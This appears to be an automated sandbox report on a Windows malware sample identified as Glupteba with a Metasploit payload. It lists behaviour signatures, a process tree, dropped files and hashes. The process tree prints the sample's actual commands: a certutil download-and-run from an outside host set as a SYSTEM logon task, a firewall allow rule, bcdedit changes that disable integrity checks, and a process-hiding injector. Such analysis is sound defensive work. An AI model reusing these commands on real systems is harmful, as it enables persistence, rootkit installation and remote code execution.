Analysis

  • max time kernel
    148s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    16/01/2024, 09:28

General

  • Target

    5f8adc5247685228db6a92ca9f38f667.exe

  • Size

    4.5MB

  • MD5

    5f8adc5247685228db6a92ca9f38f667

  • SHA1

    d02e0de48708042b7d4524be3b1cb1b2c5a63d27

  • SHA256

    1d3b1052852b5248241435db8754373ea350b9d9a6980fa89fb5cc3eb07eb45a

  • SHA512

    e0c9a00d7e2a17d3b3411e44661992320c4c682cbe16dcee64f394656acf9459848b42bb106e49c81fdc30ed19b592c07f6393e98431d6b815cf8bd661a30523

  • SSDEEP

    98304:R6tu0kYaxx1CvLJcAC7eSs16YFa89rPkFZd3lVL:R6t2Y+TAC7eKkr9rMFz3

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 22 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe
    "C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2060
    • C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe
      "C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:2856
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Manipulates WinMon driver.
        • Manipulates WinMonFS driver.
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1260
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1920
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:992
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:688
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1224
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2444
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1644
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2084
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:964
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2144
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1764
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2796
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2544
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1084
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1228
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:844
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:2952
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2120
        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:892
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240116092854.log C:\Windows\Logs\CBS\CbsPersist_20240116092854.cab
    1⤵
    • Drops file in Windows directory
    PID:1580

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

          Filesize

          894KB

          MD5

          7ba4a9ad24fd0bd903324f0cba2ca500

          SHA1

          ad365648b9c3476e54258e7db9ed12d8464bf0f9

          SHA256

          bca123401d301363020d6a0b3b690ec598d25453913edbfefe1587ae839c5d32

          SHA512

          de2dbb868336eab9940b1422ed0c826ac2869ffc0001c626b13dded5c74ee7941a01f5d9e8307a7bc81ce71dcaf4ee5e560d176ef3039b6f4111f15f950a02e0

        • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

          Filesize

          395KB

          MD5

          5da3a881ef991e8010deed799f1a5aaf

          SHA1

          fea1acea7ed96d7c9788783781e90a2ea48c1a53

          SHA256

          f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4

          SHA512

          24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

          Filesize

          94KB

          MD5

          d98e78fd57db58a11f880b45bb659767

          SHA1

          ab70c0d3bd9103c07632eeecee9f51d198ed0e76

          SHA256

          414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

          SHA512

          aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

          Filesize

          90KB

          MD5

          f8e1e983c976b0068af60fbae41ecace

          SHA1

          7b706e53b1c19988d5b6f8526ca53843a00b2b6a

          SHA256

          40c23089e4ee7dd8c0c3722696ae0c555a090ad1e54aead41fd9474845f52bb6

          SHA512

          9b78f5d9b9b80b8eb6205d9cb39d98d7ed7d7b9b3f9d36ffc8394667d9b785f9cbbc65053af6c016817f7b10a528acf37f7a730d1d234a8f316a4eef19990253

        • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          44KB

          MD5

          bf24d123c6fe6ab8c5bf88e917b71f67

          SHA1

          b9c506236a8f7afbea7abc99c81db22b84cefbe3

          SHA256

          3749921a4bae4003a127275a6cd9e82dc044a4755832fc7fd45bf1a991f05bd9

          SHA512

          2114db96eff691e15cda76f07324d78470a5f920618631aa044663c21450817e4e087e8a128d59220ceb4a83fef3a21615b3b1255308a0f65f9c1bf32f93f3fb

        • C:\Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          591KB

          MD5

          e2f68dc7fbd6e0bf031ca3809a739346

          SHA1

          9c35494898e65c8a62887f28e04c0359ab6f63f5

          SHA256

          b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

          SHA512

          26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          884863266cf1aadddab6a8d40ea0a5cf

          SHA1

          2b56c255994c757a054a500397c8ce3238006d63

          SHA256

          ba2e3ffeb4710f079a4ad26ad1d387c71373faf1104a951be578e0074c6ab137

          SHA512

          338d15d1fe2449647342d4d9bbea4f840df28a6d9c19329e1f76f1b44a1144d04e1e837204d303286a2c6cdb02422ec81bce7587c7d90e6b04ac4c9331a027a1

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          767924fcab7a4f512186a878d6e53b01

          SHA1

          71873fcf952e5b9420725966d97e24cab38657f4

          SHA256

          52ceecc9954dd985ad6e664c16f0826ee8a57e385e08a92e27189ace25cf755e

          SHA512

          2eb4edd9a4ce501cc008736cf291b983fb9e8f29c61d83a8afdbb93f2ecf1661bfcb99d7b2a3c3f3238138bb8ec472c1d7ae1847c2e5870acc6307f2095a0d67

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          c044a8d4ecd73a077a57e92033826aa7

          SHA1

          7fb07d11a1d679a9cc18558c0069781b048f9174

          SHA256

          cc741b979ab92f7f7dbc30440ef6b2dabbb0d742bdb79d6bdf4ac0d09c78893f

          SHA512

          029b6356abc953a9916e120ccfa4eb3ccd911140b93ffef9442477006c747acf26ab5a6b4695918c021dd5467763c61890d30fe472fb6ef6b027de8dcbe0cffd

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          076fcc711b8e28e0d9a762c778bcd0c4

          SHA1

          a71e5a2871677b5da818c5079a33ade3285cd78d

          SHA256

          4a395ffd3314d569f83462c0876dd0ee30fed45c0edb5a280e05ad186cf180b5

          SHA512

          d670e3425d963590140e1fcec9fba3b9231fc65f3adbef2c381285bf603e86280f9e88c7c5fbbb51691891cd3fa11874da8c52f5785148153190d89379217b91

        • C:\Windows\Temp\Tar5009.tmp

          Filesize

          171KB

          MD5

          9c0c641c06238516f27941aa1166d427

          SHA1

          64cd549fb8cf014fcd9312aa7a5b023847b6c977

          SHA256

          4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

          SHA512

          936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

        • C:\Windows\rss\csrss.exe

          Filesize

          215KB

          MD5

          f09d2cdcdbe7cdc1e725c6a90adc70ac

          SHA1

          9bef72d6a361242bb340f405a7460fa5a1c0fc14

          SHA256

          ebef8f61fcd12ea156cfa445b4e02ba09b51064e5cbe9a95a4fce07876caa596

          SHA512

          8da2f10dff4a23e19cd57ce4a4dae4da431c497543c5ac02264dca5fb9015a5528f2a7332366a05bbf6027dc2fca46afa76590d427e03517f2b46d11d9a7ae58

        • C:\Windows\rss\csrss.exe

          Filesize

          134KB

          MD5

          03f77ca3cd2d7cd45e1b4516cdf297b1

          SHA1

          23214578ffe641d08095a7bc943e9b254020f836

          SHA256

          bf083fe0dc8ed4bd65e2ab7cc75e784032c5e1096114f86aff26a0f110021d84

          SHA512

          7bbdf7380d4b3855129034779c246dded3b9d901b12154a861de68b493ee9b67e339fd34bbe826fab7dd9fe769746719483cee4ae707edbdbce298439479bfef

        • C:\Windows\rss\csrss.exe

          Filesize

          15KB

          MD5

          9f3bd111c10107f3ec04035035562988

          SHA1

          55503c2bc0345ca1d1e23ff7ec3e2339a2882639

          SHA256

          946e45ef4dc4dabb4e1221603d2c974229840b20d3fd702de822715e56c92b12

          SHA512

          5c257eb493ff23193a610ad6188c6661a72e02c533fb040ae1213b7e229cbbc3a4c2e9d65863812ae539a48a42b4d04eb6b31064825c0d56523636d67c99c6a8

        • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

          Filesize

          281KB

          MD5

          d98e33b66343e7c96158444127a117f6

          SHA1

          bb716c5509a2bf345c6c1152f6e3e1452d39d50d

          SHA256

          5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

          SHA512

          705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

        • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

          Filesize

          406KB

          MD5

          34930f30b5be3bd8eefed8fe7ad09c7f

          SHA1

          e9695004f134c7d1af233a5a79048d610c5f7379

          SHA256

          7f447f392795a8301c1be1103283c892160f21fdbe09e64728541dd4086e097e

          SHA512

          71ebad4bcf7ad8ed64e3ec0d9fc33fabec78ff09deacb79e62cde5b386db7a3d7a3da09a2be9781502ba801b3eb518fd576123550ec947becf530a0137ba862d

        • \Users\Admin\AppData\Local\Temp\dbghelp.dll

          Filesize

          15KB

          MD5

          aef05339187d23af2f408d883461af01

          SHA1

          d4c5d90bbb34c8a7a984716006984ecfa9419902

          SHA256

          c113a1509b935e6508019bfdc70ec65adfb10e452ad61590b09832d6a8d152fe

          SHA512

          0f59de7d4723a22dc15417eaadd41f9248d3b84cc61de2568d220cab6658d32c4c53f199594c686bf8b27c7eaa9252b4f98699ebb744a34341081f4a6c63de76

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          122KB

          MD5

          ed52b4accb4bfad91132c246bda61f20

          SHA1

          bbd5770e198401978a6df444457d4d9957a4d386

          SHA256

          fb5aea678d1d902d731d293897c794ba215cc1bc1934b13b9c77a4c00d409466

          SHA512

          56d217acfaae29dd11d730b87985a1ebb0dd210c5a715cbb1c32d63777ffece82de24abf96a06c1edcbd7f9963f4e4c6b1103314a332a004c0a4c595ddee8de5

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          14KB

          MD5

          2229854319621b6052a5fa7fdf243fbe

          SHA1

          a3dc67a5fc09d204dbc21e637d18f2775d4c8dff

          SHA256

          79a5bc47fe774b141c7e8d72b5e1ba00199bc0eb6a99fb86a529b10e29867e78

          SHA512

          d16743b4a87fc5bc3d09d1b0ce4bf22473d15dda205eac39670ced992114169c46bbed5217c5d8827312d3096e09b6281d1f936c5000e837e6936c001c082027

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          75KB

          MD5

          e9f3a7df4f843bca9f9cb8d853e550b2

          SHA1

          50481e7e45e42766eec1850e9217f0587ab226a8

          SHA256

          691d4605bb32c82fe11790d0b8155d0165630326af8c5084f80cdea630c1afd1

          SHA512

          846159a30999e5b21cdbbb862f76c5ea1d75cc3660b8f1e2b5894e6576d274ea5d3abf2a314cc8873df7f6c2bda84b35c44f437aefadff899e1a08091d0b7c15

        • \Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          489KB

          MD5

          326c6698775260256af4a4bde51bef12

          SHA1

          9935fb0c248f4b1441441a60d60b1012c17d7ba1

          SHA256

          3f8b2bd707246c95c38032c611c61c021a4e11cfb604a9396e836e176c55d504

          SHA512

          94e2e8ccbc46506d740021d91d89a63fc568c47b24cce73c3de7f687171ff0345336b5dda975966a5268b02e43d1d084493ec47b9700c36ba813492a743d97fa

        • \Users\Admin\AppData\Local\Temp\symsrv.dll

          Filesize

          59KB

          MD5

          ad01f3fbe7748d25b16dbdebbdf98b2a

          SHA1

          5e9c45fc1c90153b102b988f80b1859dc476a48d

          SHA256

          f3abfa9ee62e62c17c247264eec812cedd6da98eb2c58aa38767f03fd526c348

          SHA512

          d887afa6e53f29ab4210b32f4fc331605c41a14debd6d2c754f37566f2c4f38afc793502996ca77308c8d427c923448de7fc85599a54d74404615e057c4f4123

        • \Windows\rss\csrss.exe

          Filesize

          281KB

          MD5

          e20ed4d84ff2f50280cb53557f5f380f

          SHA1

          beffea89fe45ee55b0fadfbc30d169c6e0a43ac8

          SHA256

          aeab5f0f8f28781d1d127c4c74d04b6296c8c216f56123a9403a756416a597b7

          SHA512

          b97408545cfb2d2d34c28433d1b119a828188da928682b684e23b055f0a5eca8350c4994099d054946f031782fb35a3ea7622c3947b1972154f6021460133af3

        • \Windows\rss\csrss.exe

          Filesize

          222KB

          MD5

          0702e4dae1036aeca11ea6cda0f43983

          SHA1

          f52452a199a5ac99aa20ff0bdae0278885db5238

          SHA256

          40fd64492d67489f1ffb1c8d746c97befc2a386b3735e9a5fc87bf1c2e039a72

          SHA512

          35e38a13cee9f37f74bc5fffcf1696e85c32020e988b113cc91b3c7a5984efeeb777cdc7cf00db2b7c5a1615e67392e7d93ae960d32fcb6916f3e02e4930e4d6

        • memory/1920-239-0x00000000005A0000-0x0000000000B88000-memory.dmp

          Filesize

          5.9MB

        • memory/1920-55-0x00000000007B0000-0x0000000000D98000-memory.dmp

          Filesize

          5.9MB

        • memory/1920-46-0x00000000005A0000-0x0000000000B88000-memory.dmp

          Filesize

          5.9MB

        • memory/1936-237-0x0000000002790000-0x0000000002BCC000-memory.dmp

          Filesize

          4.2MB

        • memory/1936-246-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-359-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-358-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-357-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-332-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-331-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-330-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-236-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-22-0x0000000002790000-0x0000000002BCC000-memory.dmp

          Filesize

          4.2MB

        • memory/1936-238-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-20-0x0000000002790000-0x0000000002BCC000-memory.dmp

          Filesize

          4.2MB

        • memory/1936-240-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-244-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-245-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-329-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-299-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/1936-24-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2060-0-0x00000000026E0000-0x0000000002B1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2060-4-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2060-3-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2060-2-0x0000000002B20000-0x0000000003446000-memory.dmp

          Filesize

          9.1MB

        • memory/2060-6-0x00000000026E0000-0x0000000002B1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2060-1-0x00000000026E0000-0x0000000002B1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2060-7-0x0000000002B20000-0x0000000003446000-memory.dmp

          Filesize

          9.1MB

        • memory/2592-5-0x0000000002600000-0x0000000002A3C000-memory.dmp

          Filesize

          4.2MB

        • memory/2592-8-0x0000000002600000-0x0000000002A3C000-memory.dmp

          Filesize

          4.2MB

        • memory/2592-9-0x0000000002A40000-0x0000000003366000-memory.dmp

          Filesize

          9.1MB

        • memory/2592-10-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2592-19-0x0000000000400000-0x0000000000D41000-memory.dmp

          Filesize

          9.3MB

        • memory/2592-21-0x0000000002600000-0x0000000002A3C000-memory.dmp

          Filesize

          4.2MB